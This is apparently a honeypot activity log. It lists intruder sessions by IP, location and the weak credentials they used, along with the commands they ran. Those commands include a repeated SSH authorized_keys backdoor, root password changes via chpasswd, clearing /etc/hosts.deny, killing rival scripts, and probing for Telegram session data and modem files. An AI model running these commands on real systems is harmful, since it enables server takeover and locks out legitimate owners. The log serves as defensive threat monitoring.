$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "12345\nINY6TB9W5FFm\nINY6TB9W5FFm"|passwd|bash
$ Enter new UNIX password:
$ echo "12345\nINY6TB9W5FFm\nINY6TB9W5FFm\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:HBJg8Uh6TFrU"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 phantom_root_17 (102.219.126.124) β€” Luanda, Angola Β· 2 sessions Β· 39 cmds
2026-05-05 22:21 EDT Β· as root/testman1, user4/12345
file attribute tampering
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:esMS46UEKFkY"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "12345\nGtiWGOsTLaj0\nGtiWGOsTLaj0"|passwd|bash
$ Enter new UNIX password:
$ echo "12345\nGtiWGOsTLaj0\nGtiWGOsTLaj0\n"|passwd
🎭 shadow_root_114 (43.134.76.144) β€” Singapore, Singapore Β· 3 sessions Β· 60 cmds
2026-05-05 21:46 EDT Β· as ubuntu/123@qaz, ubuntu/Qazxsw123, vps/123456
file attribute tampering
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "Qazxsw123\nzVU51EGsqQ3Y\nzVU51EGsqQ3Y"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "Qazxsw123\nzVU51EGsqQ3Y\nzVU51EGsqQ3Y\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "123456\noi7E1Kt0huek\noi7E1Kt0huek"|passwd|bash
$ echo "123456\noi7E1Kt0huek\noi7E1Kt0huek\n"|passwd
$ echo -e "123@qaz\np8gPlQiQfuRg\np8gPlQiQfuRg"|passwd|bash
$ echo "123@qaz\np8gPlQiQfuRg\np8gPlQiQfuRg\n"|passwd
🎭 rogue_root_130 (103.146.23.195) β€” TΓ’y Mα»—, Vietnam Β· 1 session Β· 20 cmds
2026-05-05 21:46 EDT Β· as ubuntu/a12345678
file attribute tampering
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "a12345678\nOJN1ykXYb6o4\nOJN1ykXYb6o4"|passwd|bash
$ Enter new UNIX password:
$ echo "a12345678\nOJN1ykXYb6o4\nOJN1ykXYb6o4\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_126 (39.109.104.252) β€” Kwai Chung, Hong Kong Β· 1 session Β· 19 cmds
2026-05-05 21:45 EDT Β· as root/tsadmin123
file attribute tampering
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:kf790CXBUzAE"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_110 (103.63.108.25) β€” Haiphong, Vietnam Β· 1 session Β· 19 cmds
2026-05-05 21:29 EDT Β· as root/P@ssw0rd123!@#
file attribute tampering
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ipJL4x07YLyr"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lotus_root_21 (122.170.115.173) β€” Mumbai, India Β· 1 session Β· 20 cmds
2026-05-05 21:10 EDT Β· as vps/123456
file attribute tampering
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nEF6tsielkDRu\nEF6tsielkDRu"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nEF6tsielkDRu\nEF6tsielkDRu\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_127 (197.221.232.44) β€” Marondera, Zimbabwe Β· 1 session Β· 20 cmds
2026-05-05 21:09 EDT Β· as ubuntu/Qazxsw123
file attribute tampering
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Qazxsw123\n2EwqJxGGquTD\n2EwqJxGGquTD"|passwd|bash
$ Enter new UNIX password:
$ echo "Qazxsw123\n2EwqJxGGquTD\n2EwqJxGGquTD\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_113 (189.194.140.170) β€” Puebla City, Mexico Β· 1 session Β· 20 cmds
2026-05-05 20:44 EDT Β· as ubuntu/444
file attribute tampering
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "444\niRl3GTcYIAQ1\niRl3GTcYIAQ1"|passwd|bash
$ Enter new UNIX password:
$ echo "444\niRl3GTcYIAQ1\niRl3GTcYIAQ1\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 tulip_sol_2 (2.57.122.238) β€” Amsterdam, The Netherlands Β· 3 sessions Β· 3 cmds
2026-05-03 20:25 EDT Β· as sol/123, solv/123456, ubuntu/ubuntu
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m Γ—3 // obfuscated system check
🎭 gouda_sol_5 (176.65.139.103) β€” Eygelshoven, The Netherlands Β· 4 sessions Β· 4 cmds
2026-05-05 18:33 EDT Β· as root/12345678, root/admin, root/test@123
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—4
🎭 shadow_root_115 (128.14.236.150) β€” Taipei, Taiwan Β· 1 session Β· 20 cmds
2026-05-05 19:21 EDT Β· as test/test_123
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "test_123\nTEUuhW3omzZE\nTEUuhW3omzZE"|passwd|bash
$ Enter new UNIX password:
$ echo "test_123\nTEUuhW3omzZE\nTEUuhW3omzZE\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_116 (218.250.28.248) β€” Ho Man Tin, Hong Kong Β· 1 session Β· 9 cmds
2026-05-05 18:49 EDT Β· as root/admin
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 windmill_sol_3 (2.57.122.210) β€” Amsterdam, The Netherlands Β· 1 session Β· 1 cmd
2026-05-05 18:39 EDT Β· as ubuntu/ubuntu
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m // obfuscated system check
🎭 shadow_root_116 (186.96.151.198) β€” Mexico City, Mexico Β· 1 session Β· 20 cmds
2026-05-05 18:23 EDT Β· as user1/test
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "test\nE1P3xMvh9Ma2\nE1P3xMvh9Ma2"|passwd|bash
$ Enter new UNIX password:
$ echo "test\nE1P3xMvh9Ma2\nE1P3xMvh9Ma2\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chai_root_26 (20.244.18.126) β€” Pune, India Β· 1 session Β· 19 cmds
2026-05-05 15:44 EDT Β· as root/asd789456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:7Ht2Cce4V7V0"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 jade_root_35 (106.13.239.146) β€” Jinrongjie, China Β· 1 session Β· 19 cmds
2026-05-05 15:20 EDT Β· as root/aa279461
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:gIU56S65gSTL"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_128 (103.134.154.55) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-05 14:35 EDT Β· as root/1984
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:s2r34yMPPhXd"|chpasswd|bash
